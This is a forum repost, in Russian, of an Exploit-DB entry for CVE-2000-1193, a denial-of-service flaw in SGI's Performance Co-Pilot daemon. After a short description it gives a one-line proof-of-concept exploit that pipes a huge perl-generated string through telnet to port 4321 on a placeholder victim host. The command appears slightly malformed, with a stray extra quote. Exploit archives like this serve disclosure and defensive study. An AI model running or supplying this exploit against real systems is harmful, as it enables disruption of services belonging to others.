- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21431
- Проверка EDB
-
- Пройдено
- Автор
- MARCELO MAGNASCO
- Тип уязвимости
- DOS
- Платформа
- IRIX
- CVE
- cve-2000-1193
- Дата публикации
- 2002-04-12
Код:
source: https://www.securityfocus.com/bid/4642/info
Performance Co-Pilot (PCP) is a set of services to support system-level performance monitoring developed by SGI. It has traditionally been an IRIX product, however SGI has made it open source and it is now available for Linux systems.
A vulnerability exists in some versions of the PCP daemon. It is possible to cause a denial of service condition by sending the daemon a large string of arbitrary data.
% perl -e 'print " a" x 92834244,"\n";'' | telnet sgi.victim.com 4321
- Источник
- www.exploit-db.com